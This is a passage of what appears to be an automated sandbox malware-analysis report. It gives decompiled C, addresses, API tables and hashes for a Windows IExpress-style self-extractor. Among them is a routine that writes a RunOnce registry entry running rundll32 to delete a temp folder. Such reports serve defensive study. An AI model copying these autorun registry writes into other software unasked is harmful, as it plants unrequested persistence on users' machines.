                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0x3988c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00394234
                                                                                                                                                                                                    0x0039423c
                                                                                                                                                                                                    0x00394240
                                                                                                                                                                                                    0x003943b2
                                                                                                                                                                                                    0x003943b7
                                                                                                                                                                                                    0x003943c0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003943c5
                                                                                                                                                                                                    0x0039424c
                                                                                                                                                                                                    0x00394252
                                                                                                                                                                                                    0x00394257
                                                                                                                                                                                                    0x003943a4
                                                                                                                                                                                                    0x003943a5
                                                                                                                                                                                                    0x003943ab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003943ab
                                                                                                                                                                                                    0x00394263
                                                                                                                                                                                                    0x00394269
                                                                                                                                                                                                    0x0039426e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039427a
                                                                                                                                                                                                    0x00394280
                                                                                                                                                                                                    0x00394285
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039428d
                                                                                                                                                                                                    0x00394293
                                                                                                                                                                                                    0x003942e6
                                                                                                                                                                                                    0x003942e9
                                                                                                                                                                                                    0x003942ef
                                                                                                                                                                                                    0x003942f4
                                                                                                                                                                                                    0x003942f7
                                                                                                                                                                                                    0x00394300
                                                                                                                                                                                                    0x00394307
                                                                                                                                                                                                    0x0039430e
                                                                                                                                                                                                    0x00394315
                                                                                                                                                                                                    0x0039431c
                                                                                                                                                                                                    0x00394322
                                                                                                                                                                                                    0x00394326
                                                                                                                                                                                                    0x0039432d
                                                                                                                                                                                                    0x0039432d
                                                                                                                                                                                                    0x0039432f
                                                                                                                                                                                                    0x00394334
                                                                                                                                                                                                    0x00394343
                                                                                                                                                                                                    0x00394349
                                                                                                                                                                                                    0x0039434d
                                                                                                                                                                                                    0x00394354
                                                                                                                                                                                                    0x00394354
                                                                                                                                                                                                    0x0039435d
                                                                                                                                                                                                    0x0039436e
                                                                                                                                                                                                    0x0039436e
                                                                                                                                                                                                    0x0039437d
                                                                                                                                                                                                    0x00394383
                                                                                                                                                                                                    0x00394387
                                                                                                                                                                                                    0x0039438e
                                                                                                                                                                                                    0x0039438e
                                                                                                                                                                                                    0x00394387
                                                                                                                                                                                                    0x00394391
                                                                                                                                                                                                    0x00394399
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394295
                                                                                                                                                                                                    0x0039429f
                                                                                                                                                                                                    0x003942a5
                                                                                                                                                                                                    0x003942aa
                                                                                                                                                                                                    0x003942aa
                                                                                                                                                                                                    0x003942ad
                                                                                                                                                                                                    0x003942ad
                                                                                                                                                                                                    0x003942af
                                                                                                                                                                                                    0x003942b0
                                                                                                                                                                                                    0x003942b6
                                                                                                                                                                                                    0x003942c2
                                                                                                                                                                                                    0x003942c8
                                                                                                                                                                                                    0x003942ce
                                                                                                                                                                                                    0x003942e4
                                                                                                                                                                                                    0x003942e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003942ce

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00394236
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0039424C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00394263
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0039427A
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,003988C0,?,00000001), ref: 0039429F
                                                                                                                                                                                                    • CharPrevA.USER32(003988C0,00731181,?,00000001), ref: 003942C2
                                                                                                                                                                                                    • CharPrevA.USER32(003988C0,00000000,?,00000001), ref: 003942D6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00394391
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003943A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                    • Opcode ID: 7a9c565a7551854982f2195b17f2b3cd5473b55c282b178b90112e11dcb90451
                                                                                                                                                                                                    • Instruction ID: 046c9046874f78f07349c984d60fd685e8f4f7ac51799cba27caa12cfa3af9d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9c565a7551854982f2195b17f2b3cd5473b55c282b178b90112e11dcb90451
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30410B78A04204AFEF139F74DC84DAE7BB8EB86344F55056AE941A7351CB768C02C7A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00392773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                    				_t23 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                    							E00391781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                    							E0039658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                    								E0039658A(_t61, _t63, _v276);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(RegQueryValueExA(_v284, 0x391140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                    									_t45 = _v280;
                                                                                                                                                                                                    									if(_t45 != 2) {
                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                    										if(_t45 == 1) {
                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    											_t45 = _v280;
                                                                                                                                                                                                    											goto L9;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t59 = 0x104;
                                                                                                                                                                                                    											E00391680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x00392773
                                                                                                                                                                                                    0x0039277e
                                                                                                                                                                                                    0x00392785
                                                                                                                                                                                                    0x0039278a
                                                                                                                                                                                                    0x0039278d
                                                                                                                                                                                                    0x00392790
                                                                                                                                                                                                    0x00392792
                                                                                                                                                                                                    0x00392798
                                                                                                                                                                                                    0x0039279d
                                                                                                                                                                                                    0x003928b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003927a3
                                                                                                                                                                                                    0x003927a3
                                                                                                                                                                                                    0x003927af
                                                                                                                                                                                                    0x003927c2
                                                                                                                                                                                                    0x003927c8
                                                                                                                                                                                                    0x003927cd
                                                                                                                                                                                                    0x003927d5
                                                                                                                                                                                                    0x003928b7
                                                                                                                                                                                                    0x003928b9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003927db
                                                                                                                                                                                                    0x003927dd
                                                                                                                                                                                                    0x003928aa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003927e3
                                                                                                                                                                                                    0x003927e3
                                                                                                                                                                                                    0x003927ec
                                                                                                                                                                                                    0x003927f8
                                                                                                                                                                                                    0x00392803
                                                                                                                                                                                                    0x0039280b
                                                                                                                                                                                                    0x00392831
                                                                                                                                                                                                    0x003928c3
                                                                                                                                                                                                    0x003928c9
                                                                                                                                                                                                    0x003928cd
                                                                                                                                                                                                    0x00392837
                                                                                                                                                                                                    0x0039285a
                                                                                                                                                                                                    0x0039285c
                                                                                                                                                                                                    0x00392865
                                                                                                                                                                                                    0x00392892
                                                                                                                                                                                                    0x00392895
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392867
                                                                                                                                                                                                    0x00392878
                                                                                                                                                                                                    0x0039288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039287a
                                                                                                                                                                                                    0x00392880
                                                                                                                                                                                                    0x00392885
                                                                                                                                                                                                    0x00392897
                                                                                                                                                                                                    0x00392899
                                                                                                                                                                                                    0x00392899
                                                                                                                                                                                                    0x00392878
                                                                                                                                                                                                    0x00392865
                                                                                                                                                                                                    0x003928a0
                                                                                                                                                                                                    0x003928bf
                                                                                                                                                                                                    0x003928c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003928c1
                                                                                                                                                                                                    0x00392831
                                                                                                                                                                                                    0x003927dd
                                                                                                                                                                                                    0x003927d5
                                                                                                                                                                                                    0x003928e5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharUpperA.USER32(74C05EB4,00000000,00000000,00000000), ref: 003927A8
                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 003927B5
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 003927BC
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392829
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392852
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392870
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003928A0
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003928AA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 003928B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003927E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                    • Opcode ID: 99a52fa49e25eee986d1f338a6be76a663e05995f034416b0847f637c3334096
                                                                                                                                                                                                    • Instruction ID: 622b907c2ce06b471083f50400758771da4e54447a64418918c49265747519ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a52fa49e25eee986d1f338a6be76a663e05995f034416b0847f637c3334096
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F41A271A0412CAFDF269B649C85AFB77BDEB55700F0040AAF549E2110DB708E858FA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                    			E00392267() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v836;
                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                    				int _v844;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                    				if( *0x398530 != 0) {
                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E0039658A( &_v268, 0x104, 0x391140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    							E0039171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00392272
                                                                                                                                                                                                    0x00392277
                                                                                                                                                                                                    0x00392279
                                                                                                                                                                                                    0x00392283
                                                                                                                                                                                                    0x00392289
                                                                                                                                                                                                    0x003922ab
                                                                                                                                                                                                    0x003922b1
                                                                                                                                                                                                    0x003922c4
                                                                                                                                                                                                    0x003922e0
                                                                                                                                                                                                    0x003922e6
                                                                                                                                                                                                    0x003922f5
                                                                                                                                                                                                    0x0039230d
                                                                                                                                                                                                    0x0039231c
                                                                                                                                                                                                    0x0039231c
                                                                                                                                                                                                    0x00392321
                                                                                                                                                                                                    0x0039233a
                                                                                                                                                                                                    0x00392342
                                                                                                                                                                                                    0x00392348
                                                                                                                                                                                                    0x0039234b
                                                                                                                                                                                                    0x0039234c
                                                                                                                                                                                                    0x0039234c
                                                                                                                                                                                                    0x0039234e
                                                                                                                                                                                                    0x0039234f
                                                                                                                                                                                                    0x0039236e
                                                                                                                                                                                                    0x0039236e
                                                                                                                                                                                                    0x0039237a
                                                                                                                                                                                                    0x00392380
                                                                                                                                                                                                    0x00392380
                                                                                                                                                                                                    0x00392381
                                                                                                                                                                                                    0x00392381
                                                                                                                                                                                                    0x0039238f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003922A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003922D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 003922F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00392305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0039236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0039237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • wextract_cleanup1, xrefs: 0039227C, 003922CD, 00392363
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00392299
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0039232D
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00392321
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                    • API String ID: 3027380567-2048191181
                                                                                                                                                                                                    • Opcode ID: 842a0f8915a133b7cac062de45a442ff22a80f73d53f277717c63cbf06544dbc
                                                                                                                                                                                                    • Instruction ID: 8671e235dc842ea7641ef4e384b502dc59aedc7c06dabf6a957dce99cf0d022b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 842a0f8915a133b7cac062de45a442ff22a80f73d53f277717c63cbf06544dbc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD31B871900218BBDF239B55DC85FEB777CEB55700F0001A6F50DE6150DA715B48CA50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00393100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0x398590 == 0) {
                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                    						 *0x398590 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t8 - 1;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					EndDialog(_a4, ??);
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t11 - 0x100;
                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                    					E003943D0(_t33, _t16);
                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0x398d4c);
                                                                                                                                                                                                    					SetWindowTextA(_t33, "nst0dum");
                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                    					 *0x3988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E003930C0);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a12 != 6) {
                                                                                                                                                                                                    					if(_a12 != 7) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x00393108
                                                                                                                                                                                                    0x0039310b
                                                                                                                                                                                                    0x003931b7
                                                                                                                                                                                                    0x003931ca
                                                                                                                                                                                                    0x003931d0
                                                                                                                                                                                                    0x003931d0
                                                                                                                                                                                                    0x003931da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003931da
                                                                                                                                                                                                    0x00393111
                                                                                                                                                                                                    0x00393114
                                                                                                                                                                                                    0x00393136
                                                                                                                                                                                                    0x00393136
                                                                                                                                                                                                    0x00393138
                                                                                                                                                                                                    0x0039313b
                                                                                                                                                                                                    0x00393141
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393143
                                                                                                                                                                                                    0x00393116
                                                                                                                                                                                                    0x0039311b
                                                                                                                                                                                                    0x0039314b
                                                                                                                                                                                                    0x00393151
                                                                                                                                                                                                    0x00393158
                                                                                                                                                                                                    0x0039316a
                                                                                                                                                                                                    0x00393176
                                                                                                                                                                                                    0x0039317d
                                                                                                                                                                                                    0x0039318b
                                                                                                                                                                                                    0x0039319e
                                                                                                                                                                                                    0x003931a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003931ad
                                                                                                                                                                                                    0x00393120
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039312a
                                                                                                                                                                                                    0x00393134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393134
                                                                                                                                                                                                    0x0039312c
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0039313B
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0039314B
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0039316A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00393176
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0039317D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00393185
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00393190
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,003930C0), ref: 003931A3
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003931CA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 3785188418-432003757
                                                                                                                                                                                                    • Opcode ID: 55e444d88866261313e0f070029df86cc7e58eca10b1e468805bf6f4aa582555
                                                                                                                                                                                                    • Instruction ID: 64cc585ffd12ef7a51c9b1325663316d9e66c5d6ab0034af10bb258ab8c36c32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55e444d88866261313e0f070029df86cc7e58eca10b1e468805bf6f4aa582555
